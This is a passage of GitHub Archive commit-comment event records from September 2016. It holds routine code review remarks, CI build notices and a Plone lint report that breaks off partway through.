{"id":"4642577834","type":"CommitCommentEvent","actor":{"login":"josemvm"},"repo":{"name":"3liz/lizmap-web-client"},"payload":{"comment":{"id":19238847,"position":null,"line":null,"path":null,"commit_id":"43928e32c482fae4d20a70e1f4325582868ca8b1","created_at":"2016-09-30T10:08:35Z","updated_at":"2016-09-30T10:08:35Z","body":"sorry, i didn't have the updated map_print.tpl file.\r\neverything is ok!\r\n\r\nthanks again"}},"created_at":"2016-09-30T10:08:35Z"}
{"id":"4642581937","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238859,"position":164,"line":184,"path":"atlas-api/src/main/java/org/atlasapi/query/v4/channelgroup/ChannelGroupQueryExecutor.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:09:31Z","updated_at":"2016-09-30T10:09:31Z","body":"Annotation parsing is a bit more complicated than this because there is support in there for nested annotations (e.g. `content.description` in a schedule call).\r\n\r\nInstead I think you can do `QueryContext.getAnnotations()`"}},"created_at":"2016-09-30T10:09:31Z"}
{"id":"4642582738","type":"CommitCommentEvent","actor":{"login":"SahnounM91"},"repo":{"name":"abdo1992/AIR-templat"},"payload":{"comment":{"id":19238860,"position":4,"line":346,"path":"css/style.css","commit_id":"01f34eb4a5be4388df594859ef226e1c892ef770","created_at":"2016-09-30T10:09:42Z","updated_at":"2016-09-30T10:09:42Z","body":"ok bb"}},"created_at":"2016-09-30T10:09:42Z"}
{"id":"4642583037","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19238861,"position":35,"line":35,"path":"cura/Settings/ProfilesPageModel.py","commit_id":"2742a4ef65c28df22ceeb8c949f229f7558c3b85","created_at":"2016-09-30T10:09:46Z","updated_at":"2016-09-30T10:09:46Z","body":"This code currently duplicates the functionality in ProfileMenu.qml, where it is implemented via `InstanceContainersModel`: https://github.com/Ultimaker/Cura/blob/master/resources/qml/Menus/ProfileMenu.qml#L36\r\n\r\nCan we use `InstanceContainersModel` instead, with a filter?"}},"created_at":"2016-09-30T10:09:46Z"}
{"id":"4642589622","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238869,"position":97,"line":139,"path":"atlas-api/src/test/java/org/atlasapi/query/v4/channelgroup/ChannelGroupQueryExecutorTest.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:11:17Z","updated_at":"2016-09-30T10:11:17Z","body":"Split this into two tests so each test is doing fewer things. One for testing `regions` and one for testing `platform`"}},"created_at":"2016-09-30T10:11:17Z"}
{"id":"4642590913","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238870,"position":145,"line":187,"path":"atlas-api/src/test/java/org/atlasapi/query/v4/channelgroup/ChannelGroupQueryExecutorTest.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:11:35Z","updated_at":"2016-09-30T10:11:35Z","body":"Obsolete comment? :)"}},"created_at":"2016-09-30T10:11:35Z"}
{"id":"4642591744","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238872,"position":12,"line":12,"path":"atlas-core/src/main/java/org/atlasapi/channel/ResolvedChannelGroup.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:11:46Z","updated_at":"2016-09-30T10:11:46Z","body":"private final"}},"created_at":"2016-09-30T10:11:46Z"}
{"id":"4642596795","type":"CommitCommentEvent","actor":{"login":"DCooksey"},"repo":{"name":"jolocom/little-sister"},"payload":{"comment":{"id":19238881,"position":null,"line":null,"path":null,"commit_id":"6c8e059df0d04c30a6bbb4c92c18f28ebaa84de9","created_at":"2016-09-30T10:12:57Z","updated_at":"2016-09-30T10:12:57Z","body":"Incorrect reference in the commit . This fixes #228 instead"}},"created_at":"2016-09-30T10:12:57Z"}
{"id":"4642599520","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238888,"position":18,"line":18,"path":"atlas-core/src/main/java/org/atlasapi/channel/ResolvedChannelGroup.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:13:35Z","updated_at":"2016-09-30T10:13:35Z","body":"Instead of a `create` method it will be easier to make a builder instead. This way as you add new fields to this class all you have to do is add new `withX` methods to the builder."}},"created_at":"2016-09-30T10:13:35Z"}
{"id":"4642600151","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19238890,"position":null,"line":null,"path":null,"commit_id":"08d9ec5a5ab03df80174392c93371388149ec0d4","created_at":"2016-09-30T10:13:44Z","updated_at":"2016-09-30T10:13:44Z","body":"Score of dangerous_checks vs base: 247 - 230 - 666  [0.507] 1143\r\nELO difference: 5.17 +/- 13.00"}},"created_at":"2016-09-30T10:13:44Z"}
{"id":"4642600202","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238891,"position":null,"line":null,"path":null,"commit_id":"cf0dd6e71c2abf9c06a2b583c1e072c1685c1bbf","created_at":"2016-09-30T10:13:45Z","updated_at":"2016-09-30T10:13:45Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1221](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14680&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-30T10:13:45Z"}
{"id":"4642601356","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238896,"position":22,"line":22,"path":"atlas-core/src/main/java/org/atlasapi/channel/ResolvedChannelGroup.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:14:01Z","updated_at":"2016-09-30T10:14:01Z","body":"This class should be immutable so should have no setters. Also don't accept nulls as parameters"}},"created_at":"2016-09-30T10:14:01Z"}
{"id":"4642602653","type":"CommitCommentEvent","actor":{"login":"salix5"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":19238899,"position":null,"line":null,"path":null,"commit_id":"b35329ad91b02a13769f6c15db15f7dc279126db","created_at":"2016-09-30T10:14:20Z","updated_at":"2016-09-30T10:14:20Z","body":"我原本以為在windows上統一傳成CRLF以後\r\n存回去的時候會自己轉回LF\r\n"}},"created_at":"2016-09-30T10:14:20Z"}
{"id":"4642603889","type":"CommitCommentEvent","actor":{"login":"mosop"},"repo":{"name":"mosop/cli"},"payload":{"comment":{"id":19238904,"position":null,"line":null,"path":null,"commit_id":"cfea784827df0f93170479c08b6b8357b2a5adac","created_at":"2016-09-30T10:14:38Z","updated_at":"2016-09-30T10:14:38Z","body":"#1 "}},"created_at":"2016-09-30T10:14:38Z"}
{"id":"4642605836","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238906,"position":22,"line":22,"path":"atlas-core/src/main/java/org/atlasapi/channel/ResolvedChannelGroup.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:15:06Z","updated_at":"2016-09-30T10:15:06Z","body":"With a builder this would be:\r\n\r\n```\r\nbuilder = ResolvedChannelGroup.builder(channelGroup).\r\n// other things\r\nif (weHaveRegions) {\r\n    builder.withRegions(...);\r\n}\r\nbuilder.build();\r\n```"}},"created_at":"2016-09-30T10:15:06Z"}
{"id":"4642608309","type":"CommitCommentEvent","actor":{"login":"alextugin"},"repo":{"name":"alextugin/hello-world"},"payload":{"comment":{"id":19238911,"position":null,"line":null,"path":null,"commit_id":"4668fb5c3535296ed68de8ee83ceeb05c32e1b3d","created_at":"2016-09-30T10:15:40Z","updated_at":"2016-09-30T10:15:40Z","body":"blabla"}},"created_at":"2016-09-30T10:15:40Z"}
{"id":"4642611244","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238913,"position":22,"line":22,"path":"atlas-core/src/main/java/org/atlasapi/channel/ResolvedChannelGroup.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:16:22Z","updated_at":"2016-09-30T10:16:22Z","body":"The default value for the regions in the builder would be `Optional.empty()` so if the `withRegions` method is never called it would be empty. If it is called then that method can be:\r\n```\r\npublic Builder withRegions(Iterable<ChannelGroup<?>> regionChannelGroups) {\r\n    this.regionChannelGroups = Optional.of(regionChannelGroups);\r\n    return this;\r\n}\r\n```"}},"created_at":"2016-09-30T10:16:22Z"}
{"id":"4642612586","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19238917,"position":null,"line":null,"path":null,"commit_id":"cf0dd6e71c2abf9c06a2b583c1e072c1685c1bbf","created_at":"2016-09-30T10:16:42Z","updated_at":"2016-09-30T10:16:42Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1221](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14680&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:02:57"}},"created_at":"2016-09-30T10:16:42Z"}
{"id":"4642613203","type":"CommitCommentEvent","actor":{"login":"Dalamar42"},"repo":{"name":"atlasapi/atlas-deer"},"payload":{"comment":{"id":19238919,"position":160,"line":180,"path":"atlas-api/src/main/java/org/atlasapi/query/v4/channelgroup/ChannelGroupQueryExecutor.java","commit_id":"a2e92d7181b497c43bd3d4174ebaaff8c1372802","created_at":"2016-09-30T10:16:49Z","updated_at":"2016-09-30T10:16:49Z","body":"Don't return null. Return `Optional.empty()` instead"}},"created_at":"2016-09-30T10:16:49Z"}
{"id":"4642613280","type":"CommitCommentEvent","actor":{"login":"LewisArdern"},"repo":{"name":"LewisArdern/augury"},"payload":{"comment":{"id":19238920,"position":null,"line":null,"path":null,"commit_id":"4979292dd8ef81ddd8f4f2435e93fca8301d0abc","created_at":"2016-09-30T10:16:50Z","updated_at":"2016-09-30T10:16:50Z","body":"Nothing to worry about"}},"created_at":"2016-09-30T10:16:50Z"}
{"id":"4642617149","type":"CommitCommentEvent","actor":{"login":"sousabraga"},"repo":{"name":"sousabraga/SistemaOlimpiadas"},"payload":{"comment":{"id":19238927,"position":2,"line":202,"path":"src/java/br/estacio/sistemaolimpiada/dao/PaisDAO.java","commit_id":"a8573314995de2b836364297ac109ae3a169c434","created_at":"2016-09-30T10:17:44Z","updated_at":"2016-09-30T10:17:44Z","body":"Sim, se um país ganhar mais de uma medalha igual no mesmo esporte. Não\ntestei isso, acredito que resolva com um DISTINCT na sub consulta. Que ai\ncaso tenha essa redundância, ele só trará um valor.\n\nPode testar ai?\n\nEm 30 de setembro de 2016 00:51, João Lucas Menezes <\nnotifications@github.com> escreveu:\n\n> Se um país ganhasse mais de uma medalha em um esporte, isso não geraria\n> uma tabela com códigos de esporte repetidos na subconsulta?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/sousabraga/SistemaOlimpiadas/commit/a8573314995de2b836364297ac109ae3a169c434#commitcomment-19235930>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMLHhlh7D9HG-OCpfDXlHS0P7n9VmQp9ks5qvIdOgaJpZM4KKs4R>\n> .\n>\n"}},"created_at":"2016-09-30T10:17:44Z"}
{"id":"4642617600","type":"CommitCommentEvent","actor":{"login":"27629678"},"repo":{"name":"meteor/simple-todos"},"payload":{"comment":{"id":19238928,"position":null,"line":null,"path":null,"commit_id":"f345b40d5bf55026d8bb72a771971d06f6cec25e","created_at":"2016-09-30T10:17:50Z","updated_at":"2016-09-30T10:17:50Z","body":"insert 「import '../imports/api/tasks.js'」 into app/server/main.js，this code need to be run at backend."}},"created_at":"2016-09-30T10:17:50Z"}
{"id":"4642617795","type":"CommitCommentEvent","actor":{"login":"Anarchid"},"repo":{"name":"ZeroK-RTS/Zero-K"},"payload":{"comment":{"id":19238929,"position":5,"line":95,"path":"LuaRules/Gadgets/unit_commander_upgrade.lua","commit_id":"045c9d605441c3d08f418494e1a138f393c2d662","created_at":"2016-09-30T10:17:53Z","updated_at":"2016-09-30T10:17:53Z","body":"there's actually a unit named Zero in Zero-K :0"}},"created_at":"2016-09-30T10:17:53Z"}
{"id":"4642622260","type":"CommitCommentEvent","actor":{"login":"chintans"},"repo":{"name":"Promact/slack-erp-custom-integration-mvc"},"payload":{"comment":{"id":19238942,"position":null,"line":null,"path":null,"commit_id":"52b2a3dec8d8a75c7ca186162e90444f530ad330","created_at":"2016-09-30T10:18:54Z","updated_at":"2016-09-30T10:18:54Z","body":"Code is still not optimized"}},"created_at":"2016-09-30T10:18:54Z"}
{"id":"4642636668","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19238972,"position":null,"line":null,"path":null,"commit_id":"e8084d93884a06bae5f8a5accdf110d4af1779e2","created_at":"2016-09-30T10:22:08Z","updated_at":"2016-09-30T10:22:08Z","body":"Not by broadcasters,indeed, but by ViX. Just have a look how nice this font is, especially (but not only) on large screens."}},"created_at":"2016-09-30T10:22:08Z"}
{"id":"4642636676","type":"CommitCommentEvent","actor":{"login":"juliepromact"},"repo":{"name":"Promact/slack-erp-custom-integration-mvc"},"payload":{"comment":{"id":19238973,"position":null,"line":null,"path":null,"commit_id":"52b2a3dec8d8a75c7ca186162e90444f530ad330","created_at":"2016-09-30T10:22:09Z","updated_at":"2016-09-30T10:22:09Z","body":"Will search for a better way, Sir."}},"created_at":"2016-09-30T10:22:09Z"}
{"id":"4642637592","type":"CommitCommentEvent","actor":{"login":"0x384c0"},"repo":{"name":"tonyli508/AlamofireDomain"},"payload":{"comment":{"id":19238976,"position":null,"line":null,"path":null,"commit_id":"6da492bd06b36d0738fa46edd6537249ae9b41e2","created_at":"2016-09-30T10:22:21Z","updated_at":"2016-09-30T10:22:21Z","body":"Do you plan to support this library?\r\nI mean applying changes from main Alamofire repo and keeping ios 8 compatibility."}},"created_at":"2016-09-30T10:22:21Z"}
{"id":"4642643090","type":"CommitCommentEvent","actor":{"login":"buzmakov"},"repo":{"name":"samoylv/WPG"},"payload":{"comment":{"id":19238989,"position":null,"line":null,"path":null,"commit_id":"9f5fd356a1fae583016d26c8d220bc26a2689f2b","created_at":"2016-09-30T10:23:33Z","updated_at":"2016-09-30T10:23:33Z","body":"Hi, I start adding simple test for pytest in this commit 0c8b397\r\nI will append new test during development"}},"created_at":"2016-09-30T10:23:33Z"}
{"id":"4642648121","type":"CommitCommentEvent","actor":{"login":"AlexAndallon"},"repo":{"name":"MobileComputingClass/FirstAndroidApp_AfternoonClass"},"payload":{"comment":{"id":19239000,"position":null,"line":null,"path":null,"commit_id":"84a474bed341b4f53667c9483f6b99c1be99546d","created_at":"2016-09-30T10:24:43Z","updated_at":"2016-09-30T10:24:43Z","body":"@manalilib @JeromeGeneroso "}},"created_at":"2016-09-30T10:24:43Z"}
{"id":"4642657177","type":"CommitCommentEvent","actor":{"login":"chintans"},"repo":{"name":"Promact/slack-erp-custom-integration-mvc"},"payload":{"comment":{"id":19239015,"position":null,"line":null,"path":null,"commit_id":"52b2a3dec8d8a75c7ca186162e90444f530ad330","created_at":"2016-09-30T10:26:53Z","updated_at":"2016-09-30T10:26:53Z","body":"There are programming issues. I hope it does not require too much amount of time."}},"created_at":"2016-09-30T10:26:53Z"}
{"id":"4642660516","type":"CommitCommentEvent","actor":{"login":"sriemer"},"repo":{"name":"Irqbalance/irqbalance"},"payload":{"comment":{"id":19239023,"position":null,"line":null,"path":null,"commit_id":"699deffdd881bf4759f3fcc4d6ee3e018e4c266e","created_at":"2016-09-30T10:27:37Z","updated_at":"2016-09-30T10:27:37Z","body":"This is reproducible with Xen/AWS EC2 PV VMs. No issue with QEMU as it always provides PCI devices."}},"created_at":"2016-09-30T10:27:37Z"}
{"id":"4642664369","type":"CommitCommentEvent","actor":{"login":"simonnandra1992"},"repo":{"name":"Evisceration/DeviceControl"},"payload":{"comment":{"id":19239034,"position":5,"line":26,"path":"app/src/main/java/org/namelessrom/devicecontrol/modules/cpu/CpuUtils.java","commit_id":"e911dd4e008412c3912eebdfffb99d47020b4e2a","created_at":"2016-09-30T10:28:34Z","updated_at":"2016-09-30T10:28:34Z","body":"Nxjf"}},"created_at":"2016-09-30T10:28:34Z"}
{"id":"4642674087","type":"CommitCommentEvent","actor":{"login":"0x384c0"},"repo":{"name":"makoto2359/AlamofireImage"},"payload":{"comment":{"id":19239053,"position":null,"line":null,"path":null,"commit_id":"d4d9aecc0f404973d35ded74e944a5ad9fc4ab73","created_at":"2016-09-30T10:30:46Z","updated_at":"2016-09-30T10:30:46Z","body":"Do you plan to support this library?\r\nI mean applying changes from main AlamofireImage repo and keeping ios 8 compatibility."}},"created_at":"2016-09-30T10:30:46Z"}
{"id":"4642674886","type":"CommitCommentEvent","actor":{"login":"fcambus"},"repo":{"name":"jpmens/jo"},"payload":{"comment":{"id":19239057,"position":null,"line":null,"path":null,"commit_id":"47f52c2016fa5294911cd73b538fa4ba9e59f8d6","created_at":"2016-09-30T10:30:59Z","updated_at":"2016-09-30T10:30:59Z","body":"FYI, jo has been imported in pkgsrc (it's not in wip anymore): http://pkgsrc.se/textproc/jo"}},"created_at":"2016-09-30T10:30:59Z"}
{"id":"4642680372","type":"CommitCommentEvent","actor":{"login":"wuqinduo"},"repo":{"name":"wuqinduo/tfkz"},"payload":{"comment":{"id":19239069,"position":3,"line":3,"path":"README.md","commit_id":"10b7215757a1fb362e133a21d15ef164013c348c","created_at":"2016-09-30T10:32:23Z","updated_at":"2016-09-30T10:32:23Z","body":"同福客栈\r\n访问：\r\n      http://127.0.0.1:8080/tfkz-userManagement/admin/login?username=wu&password=123"}},"created_at":"2016-09-30T10:32:23Z"}
{"id":"4642692370","type":"CommitCommentEvent","actor":{"login":"taner-yilmaz"},"repo":{"name":"uxrocket/uxrocket.select"},"payload":{"comment":{"id":19239096,"position":null,"line":null,"path":null,"commit_id":"4b44fca4dfd167d6096aa55a677f96bc03adca2d","created_at":"2016-09-30T10:35:27Z","updated_at":"2016-09-30T10:35:27Z","body":"tabindex issue fixed"}},"created_at":"2016-09-30T10:35:27Z"}
{"id":"4642693146","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.app.discussion"},"payload":{"comment":{"id":19239098,"position":null,"line":null,"path":null,"commit_id":"c8f657f544b35ac564f29a0c6c43eb417995a7c1","created_at":"2016-09-30T10:35:38Z","updated_at":"2016-09-30T10:35:38Z","body":"@loechel Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.app.discussion/97/violations\n```\nplone/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/__init__.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/catalog.py:89:17: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/comment.py:77:28: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:170:40: Q000 Remove bad quotes.\nplone/app/discussion/comment.py:172:30: S001 found %s formatter\nplone/app/discussion/comment.py:176:48: S001 found %s formatter\nplone/app/discussion/comment.py:209:14: D001 found declareProtected replace it with AccessControl.ClassSecurityInfo.protected\nplone/app/discussion/comment.py:245:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:254:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:263:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:272:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/comment.py:298:21: Q000 Remove bad quotes.\nplone/app/discussion/contentrules.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/contentrules.py:18:5: E731 do not assign a lambda expression, use a def\nplone/app/discussion/contentrules.py:26:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:59:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:70:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:81:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/contentrules.py:92:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/conversation.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/conversation.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/conversation.py:67:27: Q000 Remove bad quotes.\nplone/app/discussion/conversation.py:205:16: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:214:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:220:12: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:324:8: E713 test for membership should be 'not in'\nplone/app/discussion/conversation.py:453:29: Q000 Remove bad quotes.\nplone/app/discussion/events.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/events.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/events.py:11:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:33:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:38:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:43:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/events.py:48:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/interfaces.py:135:17: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:161:65: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:247:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:262:21: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:280:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:284:23: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:291:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:308:25: Q000 Remove bad quotes.\nplone/app/discussion/interfaces.py:390:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:394:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:398:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:402:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/interfaces.py:406:1: E302 expected 2 blank lines, found 1\nplone/app/discussion/patches.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/patches.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/testing.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/testing.py:13:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:14:1: B901 blind except: statement\nplone/app/discussion/testing.py:15:23: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:66:14: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:78:10: Q000 Remove bad quotes.\nplone/app/discussion/testing.py:81:10: Q000 Remove bad quotes.\nplone/app/discussion/tool.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tool.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/upgrades.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/upgrades.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/vocabularies.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:0:1: C101 Coding magic comment not found\nplone/app/discussion/tests/test_catalog.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_catalog.py:89:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:107:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:114:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:135:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:142:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:158:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:173:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:191:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:199:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:212:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:224:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:235:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:243:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:250:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:280:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:299:38: S001 found %s formatter\nplone/app/discussion/tests/test_catalog.py:307:47: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:347:40: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:380:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:386:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:429:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:436:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:41: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:450:49: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:533:31: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_catalog.py:578:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comment.py:55:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:56:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:57:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:106:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:108:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:114:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:130:28: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:131:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:135:32: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:136:26: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:158:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:166:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:179:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:182:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:187:25: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:231:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:262:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:267:23: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:304:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comment.py:329:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:371:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:407:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:442:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:450:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:459:38: S001 found %s formatter\nplone/app/discussion/tests/test_comment.py:468:38: S001 found %s formatter\nplone/app/discussion/tests/test_comments_viewlet.py:0:1: I001 isort found changes, run it on the file\nplone/app/discussion/tests/test_comments_viewlet.py:43:1: F811 redefinition of unused 'IConversation' from line 38\nplone/app/discussion/tests/test_comments_viewlet.py:112:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:126:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:134:43: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:135:60: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:137:66: W291 trailing whitespace\nplone/app/discussion/tests/test_comments_viewlet.py:180:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:194:59: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:196:14: D001 found assertEquals replace it with assertEqual\nplone/app/discussion/tests/test_comments_viewlet.py:236:65: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:281:27: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:316:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:405:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:406:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:411:35: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:416:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:417:13: Q000 Remove bad quotes.\nplone/app/discussion/tests/test_comments_viewlet.py:418:13: Q000 Remove bad 